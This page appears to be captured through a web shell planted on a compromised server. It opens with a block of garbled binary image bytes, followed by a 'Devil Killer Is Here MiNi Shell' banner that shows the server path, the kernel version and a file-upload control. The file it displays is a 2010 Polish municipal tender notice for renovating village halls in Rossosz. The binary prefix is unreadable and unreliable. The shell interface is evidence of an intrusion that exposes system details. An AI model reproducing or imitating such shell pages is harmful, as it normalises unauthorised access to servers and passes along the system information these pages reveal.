JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105339-N-2010.html

<p class="kh_header"><b>Rossosz: REMONT ŚWIETLIC WIEJSKICH ORAZ ICH OTOCZENIA NA TERENIE GMINY ROSSOSZ</b><br>
<b>Numer ogłoszenia: 105339 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rossosz , ul. Lubelska 8, 21-533 Rossosz, woj. lubelskie, tel. 0-83 378 45 57, faks 0-83 378 45 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rossosz.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT ŚWIETLIC WIEJSKICH ORAZ ICH OTOCZENIA NA TERENIE GMINY ROSSOSZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Remont budynku GOK wraz z remontem drogi, chodników i placu przy GOK w  
    Rossoszu przy ul Batalionów Chłopskich Nr 53 o zakresie;
  - Pokrycie starego dachu papą termozgrzewalną w ilości 427,60 mk,
  - Wymiana rynien dachowych w ilości 75,00 m,
  - Wymiana rur spustwoych w ilości 30,60 m,
  - Wymiana i uzupełnienie obróbek blacharskich w lacznej ilości 59,71 mk,
  - Wymiana drewnianych okien na okna z PCV w ilości 53 sztuk,
  - Wymiana parapetów okiennych zewnętrznych w ilości 49 sztuk,
  - Ocieplenie ścian warstwą 10 cm styropianu wraz z wykonaniem tynku 
    elewacyjnego w ilości 635,40 mk i ościeży okien w ilości 28,45 mk,
  - Rozebranie starych chodników, wysepek i przejść dla pieszych z płyt 
    betonowych 35x35x3cm  w ilości 119,23 mk,
  - Rozebranie ograniczników z krawężników 15 x 30 cm w ilości 266,55 m,
  - Wykonanie chodnika z kostki betonowej o grubości 6 cm na podsypce 
    cementowo-piaskowej o grubości 5 cm w ilości 153,90 mk, 
  - Ustawienie obrzeży chodnikowych w ilości 117,83 m, 
  - Ustawienie ograniczników z krawężnika betonowego 20x30 cm w ilości 244,49 m
  - Wykonanie placy i zatoki postojowej z kostki betonowej 8 cm z pasami 
    rozdzielczymi na podsypce cementowo- piaskowej grubości 5 cm na łącznej 
    powierzchni 71,50 mk,
 - Wykonanie nawierzchni dróg i placów z mieszanki asfaltu lanego  grysowo-
    żwirowego o warstwie wiążącej grub. 3 cm i z warstwą ścieralną grub. 3 cm na 
    powierzchni 576,59 mk, 
2. Remont świetlicy i budowa 8 miejsc postojowych przy świetlicy wiejskiej w 
    Romaszkach Nr 58 Gmina Rossosz o następującym zakresie prac;
 - Wykonanie warstwy wyrównawczej pod posadzki w ilości 80,71 mk,
 - Wykonanie izolacji cieplnej i przeciwdzwiękowej z płyt styropianowych typu 
    twardego układanych na sucho 1 warstwą o grub. 2 cm wraz z 1 warstwą 
    izolacji z papy asfaltowej ułożonej na sucho na powierzchni 80,71 mk,
 - Wykonanie posadzki z kamieni sztucznych ułożonych na klej na pow. 80,71 mk,
 - Wykonanie cokolika o wysokości 15 cm z płytek terakotyw ilości 105,69 m,
 - Wykonanie okładzin stropów z plyt gipsowo-kartonowych podwieszanych na 
    ruszcie metalowym na powierzchni 75,25 mk,
 - Licowanie ścian do wysokości 2,00 m płytkami glazury na powierzchni 10,26 mk,
 - Malowanie 2 krotne mlekiem wapiennym tynków wewnetrz. na pow. 393,22 mk,
 - Malowanie 2 krotne bez gruntowania  farbą emulsujną tynków wewnętrznych na 
   powierzchni 734,24 mk,
 - Wykonanie izplacji cieplnej na stropie poddasza z płyt wełny mineralnej ułożonej   
   na sucho warstwą o grubości 10 cm na powirzchni 237,35 mk,
 - Zdjęcie warstwy ziemi z odwiezieniem na odl. 0,5 km w ilości 49,842 msz,
 - Wykonanie podbudowy z tłucznia kamiennego o warstwie 15 cm po zagęszczeniu 
   wraz z warstwą filtracyjną o grub. 10 cm na powierzchni 160,36 mk,
 - Wykonanie ograniczników z krawężników 15x30x100 cm ustawionych na ławie
   z betonu w łącznej ilości 44,50 m,
 - Wykonanie nawierzchni z kostki betonowej 8 cm z pasami rozdzielczymi, na 
   podsypce cementowo-piaskowej na powierzchni 160,36 m,    
 - Wykonanie instalacji klimatyzacyjnej zbudowanej z 2 klimatyzatorów 
   kasetonowych o wydajności grzewczej 11,2 kw i wydajności chłodzenia 10,00 kw 
   oraz z 1 rekuperatora o wydajności 700msz/h i z przewodów wentylacyjnych 
   winidurowych o średnicy do 200 mm o łącznej długości 60,30 m,
 - Budowa instalacji elektrycznej oświatlenia ogólnego i awaryjno-ewakuacyjnego 
   wraz z montażem osprzetu i tablicy rozdzielczej oraz instalacji elektrycznej w 
   gniazdach 230V i w obwodach 400V, a także instalacji ochronnej od porażeń i 
   instalacji ochronnej przed przepięciami wraz z wykonaniem połączenia 
   wyrównawczego miejscowego,
 - Wykonanie badań i pomiarów wybudowanej instalacji i obwodów elektrycznych 
   oraz instalacji uziemiającej, piorunochronnej i skuteczności zerowania oraz 
   uziemienia ochronnego i roboczego.
3. Remont świetlicy w Bordziłówce Nr 37 Gmina Rossosz o następujacym zakresie;
 - Wykonanie okładzin ścian płytą gipsowo-kartonową na ruszcie z listew 
   drewnianych na powierzchni 102,61 mk,
 - Wykonanie okladzin sropów z płyt gipsowo-kartonowych podwieszanych na 
   ruszcie metalowym na powierzchni 110,08 mk,
 - Wykonanie podłogi drewnianej z desek struganych 32 mm w ilości 36,30 mk,
 - Ocyklinowanie starej podłogi z desek w ilości 41,58 mk,
 - Lakierowanie 2-krotne emalią olejno-żywiczną powierzchni podłóg drewnianych 
    na pow. 77,88 mk, 
 - Wykonanie w obudowie z okładzin z kamienia kominka z nadmuchem ciepłego 
   powietrza  razem 2 komplety,
 - Wykonanie posadzki z plytek terakoty, z przygotowaniem podłoża - 44,75 mk,
 - Wykonanie posadzki z płytek mrozoodpornych wraz z przygotowaniem podloża na 
   powierzchni 72,73 mk,
 - Wykonanie cokolika o wysokości 15 cm z plytek terakoty z przygotowaniem 
   podłoża w ilości 18,50 m,
 - Wymiana okien drewnianych na okna z PCV w ilości 8 sztuk,
 - Wymiana drzwi drewnianych na drzwi aluminiowe przeszklone w ilości 2 sztuk,
 - Wymiana starych drzwi wejściowych na nowe drzwi wejściowe 1 sztuka,
 - Malowanie 2-krotne mlekiem wapiennym tynków wew. w ilości 320,34 mk,
 - Malowanie 2-krotne farbą emulsyjną bezgruntowania tynków na pow. 320,34 mk,
 - Wymiana rynien dachowych w ilości 42,34 m,
 - Wymiana rur spustowych w ilości 18,00 m,
 - Montaż parapetów okiennych stalowych sztuk 8 o łacznej długości 11,00 m,
 - Wykonanie podsufitki z panela PCV w ilości 8,61 mk,
 - Wykonanie tynku elewacyjnego w ilości 215,37 mk,
 - Wykonanie komina w budynku, wolnostojacego, 1-przewodowego o wym 
   0,75x0,65x1,35 m z cegly pełnej o lącznej wielkości 0,658 m sześć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.32.50-6, 45.30.00.00-0, 45.32.10.00-3, 45.41.00.00-4, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 10000 złotych należy wnieść przed upływem terminu skladania ofert.
Wadium należy wnieść w jednej z kilku form wymienionych w art.45 ust. 6 Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na zasadzie  spełnia - niespełnia warunki postępowania.
  Jeśli Wykonawca z ofertą dostarcza wymagane dokumenty takie jak:
- aktualny odpis właściwego rejestru albo zaświadczenie o wpisie do ewidencji 
   działalności gospodarczej,
- aktualne zaświadczenie wlaściwego naczelnika Urzędu Skarbowego o niezaleganiu 
   z opłacaniem podatków,
- aktualne żaświadczenie oddziału ZUS lub KRUS o niezaleganiu z opłacaniem 
  składek na ubezpieczenie zdrowotna i społeczne, 
- aktualne zaświadczenie z KRK o nie figuowaniu w rejestrze.
 To wówczas spełnia warunki udziału w postępowaniu.
 Gdy Wykonawca nie dostarczył którego kolwiek z wymienionych dokumentów to niespełnia warunków udziału w postępowaniu i gdy po wezwaniu go do ich uzupełnienia sytuacja nieuległa zmianie zostanie wykluczony z postępowania o zamówienie publiczne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na zasadzie  spełnia - nie spełnia warunki postępowania.
Jeśli Wykonawca nie złoży pomimo wezwania do uzupełnienia wymaganych załączników dotyczących wiedzy i doświadczenia to niespełnia warunków udziału w postępowaniu i zostanie wykluczony z tego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na zasadzie  spelnia - niespelnia warunki postępowania.
Jeśli Wykonawca nie przedstawi pomimo wezwania do uzupełnienia wymaganych załączników zawierających dane niezbędne do określenia potencjału technicznego Wykonawcy to oznaczać będzie, że niespełnia warunków udziału w postępowaniu i zostanie wykluczony z tego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na zasadzie  spełnia - niespełnia warunki postępowania.
Jeśli Wykonawca pomimo wezwania do uzupełnienia wymaganych załączników informujacych o osobach zdolnych do wykonania zamówienia nie przedstawi to będzie oznaczać, że Wykonawca nie spełnia tego warunku udziału w postępowaniu i zostanie wykluczony z tego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na zasadzie  spełnia - niespełnia warunki postępowania.
Jeśli Wykonawca pomimo wezwania do uzupełnienia nie przedstawi wymaganych dokumentów oznaczać to bedzie, że Wykonawca nie spełnia postawionych warunków udziału w postępowaniu i zostanie wykluczony z tego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy, że użyte do wykonania materialy budowlane będą posiadały niezbędne atesty lub certyfikaty albo świadectwa jakości, lub deklaracje zgodności z normami, albo aprobaty techniczne ITB, lub rekomendacje techniczne ITB, a w dniu odbioru robót Wykonawca dostarczy kserokopie tych dokumentów.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy, że osoby pełniące obowiązki kierowników robót należą do wlaściwej izby samorządu zawodowego i posiadają odpowiednie zaświadczenia, których kserokopie przed zawarciem umowy zostaną przedstawione zamawiającemu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Jeżeli warunki atmosferyczne nie pozwolą na wykonanie części przedmiotu 
    umowy ze wzgledów technologicznych, co może mieć wpływ na jakość 
    wykonania, trwałość  i zachowanie okresu gwarancji/rękojmi albo wystąpią inne
    uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy,
2. Jeżeli zmianie ulegnie urzędowa stawka VAT na roboty budowlane.
3. Z powodu siły wyższej zajdzie konieczność zmiany terminu wykonania umowy,
4. Z powodu zmiany wysokości lub cofnięcia przyznanych środków finansowych z 
    PROW w działaniu ODNOWA I ROZWÓJ WSI,
5. Dokonania odkryć archeologicznych, które mają wpływ na realizację umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rossosz.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wójt Gminy Rossosz
21 - 533 Rossosz
ul. Lubelska 8
 - Sekretariat Urzędu Gminy Rossosz ul. Lubelska 8 pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 11:00, miejsce: Wójt Gminy Rossosz
21 - 533 Rossosz
 ul. Lubelska 8
 - Sekretariat Urządu Gminy Rossosz ul. Lubelska 8 pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW na lata 2007 - 2013 w ramach działania ODNOWA I ROZWÓK WSI.</p>
